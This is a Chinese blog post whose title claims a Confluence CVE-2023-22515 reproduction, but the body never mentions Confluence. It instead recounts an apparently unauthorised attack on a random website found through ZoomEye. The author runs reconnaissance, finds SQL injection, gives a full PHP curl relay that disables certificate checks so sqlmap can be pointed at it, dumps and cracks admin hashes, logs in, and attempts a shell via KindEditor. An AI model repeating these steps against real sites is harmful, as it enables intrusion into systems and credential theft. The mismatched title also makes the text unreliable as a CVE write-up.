Confluence CVE-2023-22515漏洞复现

前言

在zoomeye瞎逛，找到个站，顺手搞搞，到后面还是没能拿下shell，kindeditor编辑器真草….

信息收集

zoomeye搜到的就是一个IP

whois就不查了，毛用没有又不是搞服务商…..除了自我安慰，哎
旁站查询走一波：同IP网站查询,C段查询,IP反查域名,C段旁注,旁注工具

我他妈….

用ip138查查同IP
域名查iP 域名解析 iP查询网站 iP反查域名 iP反查网站 同一iP网站 同iP网站域名iP查询

域名全部ping了一遍…发现一个域名不是同一个IP，超级ping了一下，发现在山西有个节点

端口扫描了一波，发现有节点的那个域名出现在443端口，估计是多个域名解析到同一个DNS

7kb扫描工具一顿扫，没扫出来

。。。

打开这个站一看，后台光明正大的写在主页

。。。

整理了一下收集到的信息

随便点了一下链接发现有类似&id=的url，测试了一下注入，发现SQL注入

当时就想着扔sqlmap里面跑，然后sqlmap报错。。后面想了一下这个的https证书是有问题的，还有就是sqlmap跑类似于以下的url会发神经

http://test.com/test.php?user=demo&id=1

https证书有问题

百思不得其解的时候，搜到了篇文章
sqlmap在https情况下的一个错误 | MSAREHERE
文章的作者使用在本地写了个php，然后使用curl配置屏蔽掉https错误，然后在通过curl发送数据给目标站点

<?php

$url = "http://xxx.com";
$sql = $_GET[s];
$s = urlencode($sql);
$url = $url.$sql;
echo $url;
// $params = "email=$s&password=aa";
//echo $params;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书和hosts
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)');
curl_setopt($ch, CURLOPT_TIMEOUT, 15);

// curl_setopt($ch, CURLOPT_POST, 1);    // post 提交方式
// curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

$output = curl_exec($ch);
curl_close($ch);
echo $output;
$a = strlen($output);
echo $a;
?>

本地访问了一下还真的ok

然后直接扔sqlmap跑就ok

sqlmap -u http://127.0.0.1/demos.php?s=%20*

然后发现不是dba权限

dump出后台的hash发现还有两个跑不出

还好最后一个hash跑出来了

得到用户名密码

后台一登陆，看见编辑器kindeditor

google搜了一遍，发现只能重命名或者备份getshell

[渗透实战]某铸造设备公司官网经典思路 - DYBOY - 专注程序开发与信息安全

原本打算子域名看看能不能搞的，查出来的都是什么

本文到此结束，真是玩毛….

---

转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。